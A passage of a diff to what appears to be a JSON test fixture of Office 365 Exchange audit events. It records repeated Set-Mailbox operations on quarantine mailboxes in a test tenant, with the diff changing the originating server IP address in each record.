bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3276,7 +3276,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3350,7 +3350,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3362,7 +3362,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3436,7 +3436,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3448,7 +3448,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3522,7 +3522,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3534,7 +3534,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3608,7 +3608,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3620,7 +3620,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3694,7 +3694,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3706,7 +3706,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3780,7 +3780,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 